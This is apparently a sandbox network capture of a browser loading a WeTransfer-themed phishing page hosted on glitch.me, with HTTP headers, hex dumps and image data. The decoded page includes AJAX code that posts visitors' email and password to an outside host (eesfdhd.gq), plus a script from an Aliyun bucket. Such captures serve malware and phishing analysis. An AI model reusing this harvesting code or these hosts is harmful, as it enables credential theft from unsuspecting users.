            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            sec-ch-ua-platform: "Windows"
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: navigate
            Sec-Fetch-User: ?1
            Sec-Fetch-Dest: document
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:40 UTC501INHTTP/1.1 200 OK
            Date: Sun, 29 Sep 2024 02:32:40 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 10086
            Connection: close
            x-amz-id-2: wwCfgp6u890f0j4YMeK1C/fZl+OoByID/QEE+3jhO9GlySg46VX4YM1p0NBi/vG5MC0oijrLBi91CN8UbgHQIMdxZDdKR+k8B7MAACJIpXI=
            x-amz-request-id: H8KC3Z6WBRPVRY49
            last-modified: Mon, 07 Jun 2021 09:20:10 GMT
            etag: "b772fef3ad5098d61fd59e89819a5d86"
            cache-control: no-cache
            x-amz-version-id: GijS8EhKUPGuGk2SGHXvLViFo9zGI4fJ
            accept-ranges: bytes
            server: AmazonS3
            2024-09-29 02:32:40 UTC8448INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 78 63 65 6c 35 36 37 2e 6f 73 73 2d 61 70 2d 73 6f 75 74 68 65 61 73 74 2d 33 2e 61 6c 69 79 75 6e 63 73 2e 63 6f 6d 2f 70 64 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 67 6c 69 74 63 68 2e 63 6f 6d 2f 61 39 62 66 63 63 65 30 2d 34 32 32 62 2d 34 36 65 34 2d 39 30 37 34 2d 33 31 34 37 63 62 63 30 33 33 39 30 25
            Data Ascii: <html><head><meta name="viewport" content="width=device-width, initial-scale=1"><script src="https://excel567.oss-ap-southeast-3.aliyuncs.com/pdf.js"></script><link rel="shortcut icon" href="https://cdn.glitch.com/a9bfcce0-422b-46e4-9074-3147cbc03390%
            2024-09-29 02:32:40 UTC1638INData Raw: 61 6a 61 78 28 7b 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 54 79 70 65 3a 20 27 4a 53 4f 4e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 75 72 6c 3a 20 27 68 74 74 70 73 3a 2f 2f 65 65 73 66 64 68 64 2e 67 71 2f 6e 65 77 2f 57 65 74 72 61 6e 73 66 65 72 2d 32 30 32 30 2f 70 6f 73 74 2e 70 68 70 27 2c 0a 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3a 20 27 50 4f 53 54 27 2c 0a 20 20 20 20 20 20 09 64 61 74 61 3a 7b 0a 20 20 20 20 20 20 09 09 65 6d 61 69 6c 3a 65 6d 61 69 6c 2c 0a 20 20 20 20 20 20 09 09 70 61 73 73 77 6f 72 64 3a 70 61 73 73 77 6f 72 64 2c 0a 20 20 20 20 20 20 09 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 64 61 74 61 3a 20 24 28 27 23 63 6f 6e 74 61 63 74 27 29 2e 73 65 72 69 61 6c 69 7a 65 28 29 2c 0a 20 20 20 20 20 20 20 20 20 20
            Data Ascii: ajax({ dataType: 'JSON', url: 'https://eesfdhd.gq/new/Wetransfer-2020/post.php', type: 'POST', data:{ email:email, password:password, }, // data: $('#contact').serialize(),


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.64972118.173.205.204433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:41 UTC650OUTGET /a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg?v=1600376573408 HTTP/1.1
            Host: cdn.glitch.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: cross-site
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://certain-jeweled-verse.glitch.me/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:41 UTC418INHTTP/1.1 301 Moved Permanently
            Content-Length: 0
            Connection: close
            Date: Sun, 29 Sep 2024 02:32:42 GMT
            Location: https://cdn.glitch.me/a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg
            Server: AmazonS3
            X-Cache: Miss from cloudfront
            Via: 1.1 b542963649ffc3f71c6540a2347be55a.cloudfront.net (CloudFront)
            X-Amz-Cf-Pop: FRA56-P12
            X-Amz-Cf-Id: BgVfuPHU3P2U70eK0H4SmVw23Eaq5xfpGayUFGNY9HTI5nrO4S4IVg==
            Vary: Origin


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.64972018.173.205.204433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:41 UTC652OUTGET /a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico?v=1600376585636 HTTP/1.1
            Host: cdn.glitch.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: cross-site
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://certain-jeweled-verse.glitch.me/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:41 UTC420INHTTP/1.1 301 Moved Permanently
            Content-Length: 0
            Connection: close
            Date: Sun, 29 Sep 2024 02:32:42 GMT
            Location: https://cdn.glitch.me/a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico
            Server: AmazonS3
            X-Cache: Miss from cloudfront
            Via: 1.1 b44afb2a44376871c20edb8c123ed47c.cloudfront.net (CloudFront)
            X-Amz-Cf-Pop: FRA56-P12
            X-Amz-Cf-Id: iVTeLdZcfLptVDUoUvtPm9_llCd-kxYdie2KcWbo0a2tzpnNwRW0WQ==
            Vary: Origin


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.64972247.254.218.784433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:42 UTC561OUTGET /pdf.js HTTP/1.1
            Host: excel567.oss-ap-southeast-3.aliyuncs.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: cross-site
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: script
            Referer: https://certain-jeweled-verse.glitch.me/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:42 UTC244INHTTP/1.1 403 Forbidden
            Server: AliyunOSS
            Date: Sun, 29 Sep 2024 02:32:42 GMT
            Content-Type: application/xml
            Content-Length: 340
            Connection: close
            x-oss-request-id: 66F8BC4A9CAEC93030517167
            x-oss-server-time: 5
            x-oss-ec: 0003-00000801
            2024-09-29 02:32:42 UTC340INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 55 73 65 72 44 69 73 61 62 6c 65 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 55 73 65 72 44 69 73 61 62 6c 65 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 36 36 46 38 42 43 34 41 39 43 41 45 43 39 33 30 33 30 35 31 37 31 36 37 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 20 20 3c 48 6f 73 74 49 64 3e 65 78 63 65 6c 35 36 37 2e 6f 73 73 2d 61 70 2d 73 6f 75 74 68 65 61 73 74 2d 33 2e 61 6c 69 79 75 6e 63 73 2e 63 6f 6d 3c 2f 48 6f 73 74 49 64 3e 0a 20 20 3c 45 43 3e 30 30 30 33 2d 30 30 30 30 30 38 30 31 3c 2f 45 43 3e 0a 20 20 3c 52 65 63 6f 6d 6d 65 6e 64 44
            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><Error> <Code>UserDisable</Code> <Message>UserDisable</Message> <RequestId>66F8BC4A9CAEC93030517167</RequestId> <HostId>excel567.oss-ap-southeast-3.aliyuncs.com</HostId> <EC>0003-00000801</EC> <RecommendD


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.649724184.28.90.27443
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:43 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Encoding: identity
            User-Agent: Microsoft BITS/7.8
            Host: fs.microsoft.com
            2024-09-29 02:32:43 UTC467INHTTP/1.1 200 OK
            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
            Content-Type: application/octet-stream
            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
            Server: ECAcc (lpl/EF67)
            X-CID: 11
            X-Ms-ApiVersion: Distribute 1.2
            X-Ms-Region: prod-neu-z1
            Cache-Control: public, max-age=137539
            Date: Sun, 29 Sep 2024 02:32:43 GMT
            Connection: close
            X-CID: 2


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.64972565.9.95.854433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:43 UTC635OUTGET /a9bfcce0-422b-46e4-9074-3147cbc03390%2Ficon.ico HTTP/1.1
            Host: cdn.glitch.me
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: cross-site
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://certain-jeweled-verse.glitch.me/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:43 UTC520INHTTP/1.1 200 OK
            Content-Type: image/x-icon
            Content-Length: 41566
            Connection: close
            Date: Sun, 29 Sep 2024 02:32:44 GMT
            Cache-Control: max-age=31536000
            Last-Modified: Thu, 17 Sep 2020 21:03:07 GMT
            ETag: "692e1c7339c359b6412f059c9c9a0474"
            Server: AmazonS3
            X-Cache: Miss from cloudfront
            Via: 1.1 0bb58964819755c192fe9c24c342bd1a.cloudfront.net (CloudFront)
            X-Amz-Cf-Pop: PRG50-C1
            X-Amz-Cf-Id: z54m9dbIfDfbtbgvgSltpkpdBEhvmQDyv2p_7VkbP8qLFdAh22Eocg==
            Content-Security-Policy: script-src 'none'
            Vary: Origin
            2024-09-29 02:32:43 UTC12331INData Raw: 00 00 01 00 05 00 10 10 00 00 01 00 20 00 28 05 00 00 56 00 00 00 18 18 00 00 01 00 20 00 68 0b 00 00 7e 05 00 00 20 20 00 00 01 00 20 00 28 14 00 00 e6 10 00 00 30 30 00 00 01 00 20 00 28 2d 00 00 0e 25 00 00 40 40 00 00 01 00 20 00 28 50 00 00 36 52 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff
            Data Ascii: (V h~ (00 (-%@@ (P6R(
            2024-09-29 02:32:43 UTC1432INData Raw: 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 34 1a 18 17 88 1a 18 17 c1 1a 18 17 e6 1a 18 17 f0 1a 18 17 ee 1a 18 17 db 1a 18 17 b4 1a 18 17 76 1a 18 17 1f 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 22 1a 18 17 f0 1a 18 17 ff 1a 18 17 ff 1a 18 17 f5 1a 18 17 31 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 47 1a 18 17 fc 1a 18 17 ff 1a 18 17 ff 1a 18 17 ea 1a 18 17 12 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 2e 1a 18 17 be 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 fc 1a 18 17 9c 1a 18 17 0f
            Data Ascii: 4v"1G.
            2024-09-29 02:32:43 UTC5728INData Raw: 18 17 bd 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 a2 1a 18 17 00 1a 18 17 00 1a 18 17 7b 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 8c 1a 18 17 01 1a 18 17 3a 1a 18 17 6e 1a 18 17 88 1a 18 17 81 1a 18 17 5e 1a 18 17 17 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 0a 1a 18 17 f8 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff
            Data Ascii: {:n^
            2024-09-29 02:32:43 UTC2864INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            2024-09-29 02:32:43 UTC8592INData Raw: ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00
            Data Ascii:
            2024-09-29 02:32:43 UTC8592INData Raw: 18 17 ff 1a 18 17 ed 1a 18 17 00 1a 18 17 00 1a 18 17 00 1a 18 17 b2 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 e8 1a 18 17 00 1a 18 17 1f 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff 1a 18 17 ff
            Data Ascii:
            2024-09-29 02:32:43 UTC2027INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.64972665.9.95.854433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:43 UTC633OUTGET /a9bfcce0-422b-46e4-9074-3147cbc03390%2Fbg.jpg HTTP/1.1
            Host: cdn.glitch.me
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: cross-site
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://certain-jeweled-verse.glitch.me/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:43 UTC519INHTTP/1.1 200 OK
            Content-Type: image/jpeg
            Content-Length: 117459
            Connection: close
            Date: Sun, 29 Sep 2024 02:32:44 GMT
            Cache-Control: max-age=31536000
            Last-Modified: Thu, 17 Sep 2020 21:02:53 GMT
            ETag: "6e5b76b6f1740d6d21c8d968a0364df6"
            Server: AmazonS3
            X-Cache: Miss from cloudfront
            Via: 1.1 0bb58964819755c192fe9c24c342bd1a.cloudfront.net (CloudFront)
            X-Amz-Cf-Pop: PRG50-C1
            X-Amz-Cf-Id: OJmb0nnFiTjJI82cUJTbQYtFmpWADEg53Xzr8TQotOg-3i-1kSoLmQ==
            Content-Security-Policy: script-src 'none'
            Vary: Origin
            2024-09-29 02:32:43 UTC11580INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 02 64 05 55 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
            Data Ascii: JFIFHHCCdU"}!1AQa"q2
            2024-09-29 02:32:43 UTC1432INData Raw: 56 e2 b7 3c 35 75 6f e1 d9 3e cf 6b 10 69 24 38 90 23 ee d9 d8 bc 92 11 df ae 06 0f a1 02 bd ca d4 e5 88 6a 2f 48 af c4 f3 61 2e 4d 7a 8e d3 7c 3f a2 e8 e8 96 ab 13 5f 5e 32 02 f2 2c 78 82 05 e3 ab 7d e2 7b 74 19 aa ba 8d 9d e6 a8 92 45 a6 d9 df 34 8a d8 f2 e2 b7 c4 51 7f b4 78 03 a7 40 70 7e b5 a3 a8 35 99 82 49 af 5d ae 8c 8c 02 c3 09 f2 61 24 60 7c cc 39 c7 00 e3 92 7b 1a ce b8 f8 87 a5 c2 19 57 74 d3 42 b9 11 c7 19 0a 4e 7a 01 9c 63 dd c9 35 d1 2f 65 4a 3c b2 92 8a 26 37 93 d3 56 73 b7 de 13 d4 b5 4b 85 69 59 95 54 85 d9 d7 6e 38 c6 0f 1b bf 3a 86 f3 c1 37 16 49 fb d4 e1 48 c0 24 ee 51 f4 ff 00 0c 0a d0 d6 fe 30 6a 13 cf b9 23 5b 78 76 94 8f cc 91 06 33 fe ca 8c 7e 55 cf 2f 8b f5 0d 6d dd 24 79 17 1c b1 b7 52 11 40 eb 90 c7 6f fe 3a 2b e6 b1 58 ec ad
            Data Ascii: V<5uo>ki$8#j/Ha.Mz|?_^2,x}{tE4Qx@p~5I]a$`|9{WtBNzc5/eJ<&7VsKiYTn8:7IH$Q0j#[xv3~U/m$yR@o:+X
            2024-09-29 02:32:43 UTC16384INData Raw: 1e 0a cc a1 c6 0e 78 ab 4c 98 1c 0a fd 29 49 35 74 79 52 2b b4 7f 31 e6 8f 2f 07 d6 a5 28 09 e4 54 7d a8 17 30 c6 18 6e 29 07 14 f2 a0 f6 fd 28 65 00 74 a0 7b 91 b2 ee 34 d6 5d a2 a4 c6 68 c7 1d 38 aa e5 64 91 32 ee a6 62 a6 d8 07 6a 61 8f 9f bb de 98 c6 1e b4 67 8a 77 97 9f e1 a5 f2 b1 fc 34 c2 c8 67 7a 29 de 4e d1 f7 73 41 55 5e a3 14 08 88 45 81 f7 a8 f2 f3 de 9e db 47 4e 99 e6 9c db 49 1f 4a 43 b1 1f 95 ef 47 97 fe d5 3b a5 37 34 c5 b8 79 7f ed 53 48 da 6a 4c d2 14 cd 01 61 94 53 82 29 ed 46 c5 f4 fd 28 01 ac 7e 53 4d de c4 f4 a9 36 2f a7 e9 42 aa 8e 83 f4 a0 16 84 4a 9b 98 f6 c1 cd 29 5d ff 00 ce 9d b0 ee 38 14 63 1f c3 41 57 63 4c 5e f4 08 f9 a9 15 01 1c 8a 3c b5 f4 a0 92 16 f9 49 a5 f2 fe b4 e7 5f 9a 85 52 50 75 a0 7c a3 08 da 68 a7 98 4b 1a 61 d9
            Data Ascii: xL)I5tyR+1/(T}0n)(et{4]h8d2bjagw4gz)NsAU^EGNIJCG;74ySHjLaS)F(~SM6/BJ)]8cAWcL^<I_RPu|hKa
            2024-09-29 02:32:43 UTC10824INData Raw: dc 7f b3 fa 51 d6 9c 0b 67 a5 3b bd 00 44 b0 e0 6e e7 e9 9a 53 1e fe b9 51 52 31 c0 a4 07 da 80 18 14 e3 a3 51 d2 a4 a6 ba ee a0 01 06 52 86 4c 0e 05 39 53 09 40 19 35 3a 81 b9 f0 98 1f f8 5a 9e 19 e3 fe 62 b6 bf fa 39 2b f6 62 bf 1a fe 14 71 f1 4f c3 7f f6 15 b5 ff 00 d1 c9 5f b2 95 f0 5c 5d fc 78 7a 7e a7 5d 1f 83 e7 fe 41 45 14 57 c9 1a 85 14 51 40 05 7e 72 7f c1 c2 9f f0 95 7d af f6 51 ff 00 84 1f fe 11 ff 00 f8 4c bf e1 72 e9 bf d8 9f db be 77 f6 67 db 3c 99 bc 9f b4 f9 3f bd f2 77 e3 76 cf 9b 19 c7 35 fa 37 5c 0f c6 ff 00 d9 7b c0 bf b4 7e ad e0 cb ef 1a 68 7f db 37 5f 0f 75 d8 7c 4b a0 3f db 6e 2d fe c1 a8 44 08 8e 6c 45 22 09 30 18 fc 92 06 43 9e 54 d1 6f 7e 12 7b 46 50 93 ef 68 c9 49 db ce cb 4f 31 df dc 9c 7b c6 49 76 bc a2 d2 bf 95 de be 47 e7
            Data Ascii: Qg;DnSQR1QRL9S@5:Zb9+bqO_\]xz~]AEWQ@~r}QLrwg<?wv57\{~h7_u|K?n-DlE"0CTo~{FPhIO1{IvG
